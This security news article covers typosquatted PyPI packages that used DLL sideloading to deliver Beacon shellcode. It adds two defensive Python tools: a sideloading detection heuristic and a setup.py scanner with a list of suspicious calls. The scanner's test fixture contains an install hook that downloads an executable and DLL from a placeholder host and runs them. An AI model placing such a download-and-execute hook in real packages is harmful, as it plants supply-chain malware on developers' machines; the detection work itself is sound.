Malicious PyPI Packages Bypass Security with DLL Sideloading

In a recent investigation conducted by security specialists from ReversingLabs, two malicious packages were identified within the Python Package Index (PyPI) repository, utilizing the DLL Sideloading technique to circumvent antivirus detection and execute malicious code.

The packages, named NP6HelperHttptest and NP6HelperHttper, were downloaded 537 and 166 times, respectively, before their removal from the repository. These figures highlight that even short-lived malicious packages can find their victims among developers.

[Figure: setup.py – Downloading the files]

Both malicious packages mimic the names of legitimate marketing-automation tools from ChapVision. This technique, known as typosquatting, is widely used by attackers targeting package repositories.

Both packages contain a “setup.py” script that downloads two files: a legitimate Kingsoft executable (“ComServer.exe”) that is vulnerable to DLL sideloading, and a malicious DLL (“dgdeskband64.dll”). Because the malicious code runs inside a legitimate, trusted executable that loads it, the technique is notably stealthy.

The malicious DLL’s objective is to connect to a domain controlled by the attackers to download a file disguised as a GIF. In reality, this is a shellcode for Beacon — a tool extensively used in cyberattacks following the initial compromise of a system, enabling a range of malicious activities, including data harvesting, network traversal, and the installation of additional tools.
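A sideloading chain like the one described above leaves a characteristic trace in image-load telemetry: an executable running from a user-writable directory loads a DLL sitting next to it that carries no signature from the executable's publisher. The following heuristic is an added example for this article, not ReversingLabs' detection logic. The events are constructed; their field names follow Sysmon's Event ID 7 (ImageLoaded) records, while the `ProcessSigned` and `ProcessSignature` fields are an assumed enrichment (for instance joined from the process-creation event) and are not native Sysmon fields. The paths reuse the file names from the article; the publisher names are illustrative.

```python
"""Heuristic triage of image-load events for DLL sideloading.

Added example for this article; not ReversingLabs' detection logic. Events are
constructed. Field names follow Sysmon Event ID 7 (Image, ImageLoaded, Signed,
Signature); ProcessSigned/ProcessSignature are an assumed enrichment, not Sysmon fields.
"""
from pathlib import PureWindowsPath

# Roots where a signed binary is expected to load its own DLLs; anything else is
# treated as a user-writable or otherwise untrusted location.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def is_sideload_candidate(event):
    """True when a signed EXE outside the trusted roots loads a DLL from its own
    directory and that DLL is unsigned or signed by a different publisher.
    Events without the process-signature enrichment are not flagged (conservative)."""
    exe = PureWindowsPath(event["Image"])
    dll = PureWindowsPath(event["ImageLoaded"])
    if dll.suffix.lower() != ".dll":
        return False
    same_dir = str(exe.parent).lower() == str(dll.parent).lower()
    in_trusted = str(dll).lower().startswith(TRUSTED_ROOTS)
    exe_signed = event.get("ProcessSigned") == "true"
    dll_trusted = (event.get("Signed") == "true"
                   and event.get("Signature") == event.get("ProcessSignature"))
    return same_dir and not in_trusted and exe_signed and not dll_trusted


def triage(events):
    """Return the subset of events that match the sideloading heuristic."""
    return [e for e in events if is_sideload_candidate(e)]


# Constructed sample events (illustrative publishers; paths reuse the article's names).
SAMPLE_EVENTS = [
    {   # signed EXE in %TEMP% loading an unsigned DLL from the same directory -> flag
        "Image": "C:\\Users\\dev\\AppData\\Local\\Temp\\ComServer\\ComServer.exe",
        "ImageLoaded": "C:\\Users\\dev\\AppData\\Local\\Temp\\ComServer\\dgdeskband64.dll",
        "Signed": "false", "Signature": "",
        "ProcessSigned": "true", "ProcessSignature": "Example Vendor Ltd",
    },
    {   # same EXE loading a Windows system DLL -> normal
        "Image": "C:\\Users\\dev\\AppData\\Local\\Temp\\ComServer\\ComServer.exe",
        "ImageLoaded": "C:\\Windows\\System32\\kernel32.dll",
        "Signed": "true", "Signature": "Microsoft Windows",
        "ProcessSigned": "true", "ProcessSignature": "Example Vendor Ltd",
    },
    {   # vendor app under Program Files loading its own signed helper DLL -> normal
        "Image": "C:\\Program Files\\ExampleApp\\app.exe",
        "ImageLoaded": "C:\\Program Files\\ExampleApp\\helper.dll",
        "Signed": "true", "Signature": "Example App Inc",
        "ProcessSigned": "true", "ProcessSignature": "Example App Inc",
    },
    {   # unsigned tool loading an unsigned DLL: no signed-host pretext, not this heuristic
        "Image": "C:\\Users\\dev\\tools\\tool.exe",
        "ImageLoaded": "C:\\Users\\dev\\tools\\plugin.dll",
        "Signed": "false", "Signature": "",
        "ProcessSigned": "false", "ProcessSignature": "",
    },
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print("sideload candidate:", hit["Image"], "->", hit["ImageLoaded"])
```

The heuristic deliberately keys on the pretext that makes sideloading attractive: a signed, legitimate host process. Unsigned loaders are left to other rules, and DLLs under the trusted roots are excluded to keep the false-positive rate low; an environment that installs software elsewhere would extend `TRUSTED_ROOTS`.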

The ReversingLabs researchers believe that the discovered packages are part of a larger campaign aimed at disseminating similar malicious executables, underscoring the need for vigilance on the part of developers and organizations.

Experts stress that development organizations must be aware of the supply chain threats that come with using open package repositories.

Organizations must rigorously verify source code and dependencies, and add monitoring and security controls so that they can respond promptly and protect their systems if an infection does occur.
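One concrete form of the dependency verification called for here, aimed at the install-time behaviour described earlier (a setup.py that downloads an executable and a DLL and launches them), is a static pre-install check of a package's setup.py. The scanner below is an added example for this article, not ReversingLabs' tooling or the packages' own code. It walks the Python AST, resolves import aliases, and flags network, process-execution and dynamic-code calls as well as subclasses of setuptools install commands, which is where such code usually hides. The rule table, function names and both sample setup.py texts are constructed for illustration; the fixture reuses the file and package names from the article with a non-routable placeholder host.

```python
"""Static triage of a package's setup.py for install-time download and execution.

Added example for this article, not ReversingLabs' tooling or the packages' code.
The rule table, function names and the two sample setup.py texts are constructed.
"""
import ast

# Fully-qualified calls that a benign setup.py has no reason to make at install time.
SUSPICIOUS_CALLS = {
    "urllib.request.urlretrieve": "network download",
    "urllib.request.urlopen": "network download",
    "requests.get": "network download",
    "subprocess.Popen": "process execution",
    "subprocess.run": "process execution",
    "subprocess.call": "process execution",
    "os.system": "process execution",
    "os.startfile": "process execution",
    "base64.b64decode": "obfuscation",
    "exec": "dynamic code",
    "eval": "dynamic code",
}
# setuptools command classes that run arbitrary code during `pip install` when subclassed.
INSTALL_HOOK_BASES = {
    "setuptools.command.install.install",
    "setuptools.command.develop.develop",
    "setuptools.command.egg_info.egg_info",
}


def _alias_map(tree):
    """Map names bound by import statements to fully-qualified module paths."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:
                    aliases[a.asname] = a.name            # import a.b as c -> c
                else:
                    top = a.name.split(".")[0]
                    aliases[top] = top                     # import a.b     -> a
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def _dotted_name(node):
    """Turn an attribute chain such as `sp.Popen` into 'sp.Popen'; None if not a plain chain."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _resolve(name, aliases):
    """Rewrite the leading component of a dotted name through the alias map."""
    head, _, rest = name.partition(".")
    full = aliases.get(head, head)
    return f"{full}.{rest}" if rest else full


def scan_setup_py(source):
    """Return sorted (line, fully-qualified name, reason) findings for a setup.py text."""
    tree = ast.parse(source)
    aliases = _alias_map(tree)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name is None:
                continue
            full = _resolve(name, aliases)
            if full in SUSPICIOUS_CALLS:
                findings.append((node.lineno, full, SUSPICIOUS_CALLS[full]))
        elif isinstance(node, ast.ClassDef):
            for base in node.bases:
                name = _dotted_name(base)
                if name and _resolve(name, aliases) in INSTALL_HOOK_BASES:
                    findings.append((node.lineno, _resolve(name, aliases), "custom install hook"))
    return sorted(findings)


# Constructed fixture mirroring the behaviour the article describes (placeholder host).
SAMPLE_SETUP_PY = '''\
from setuptools import setup
from setuptools.command.install import install
import urllib.request, subprocess

class PostInstall(install):
    def run(self):
        install.run(self)
        urllib.request.urlretrieve("http://example.invalid/ComServer.exe", "ComServer.exe")
        urllib.request.urlretrieve("http://example.invalid/dgdeskband64.dll", "dgdeskband64.dll")
        subprocess.Popen(["ComServer.exe"])

setup(name="NP6HelperHttptest", version="0.1", cmdclass={"install": PostInstall})
'''

# Constructed benign fixture: declares metadata only.
BENIGN_SETUP_PY = "from setuptools import setup\nsetup(name='demo', version='1.0')\n"

if __name__ == "__main__":
    for line, name, reason in scan_setup_py(SAMPLE_SETUP_PY):
        print(f"line {line}: {name} ({reason})")
    print("benign findings:", scan_setup_py(BENIGN_SETUP_PY))
```

Run it against the setup.py of each source distribution before installation (for example on the files `pip download --no-binary :all:` fetches), and treat any "custom install hook" finding combined with a network or execution finding as a reason to block the package pending review. A determined author can still hide calls behind string building or `getattr`, so this is a cheap first filter, not a substitute for sandboxed installation or package provenance checks.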

Strengthening cybersecurity and addressing threats in the software supply chain remain paramount tasks for organizations and developers today.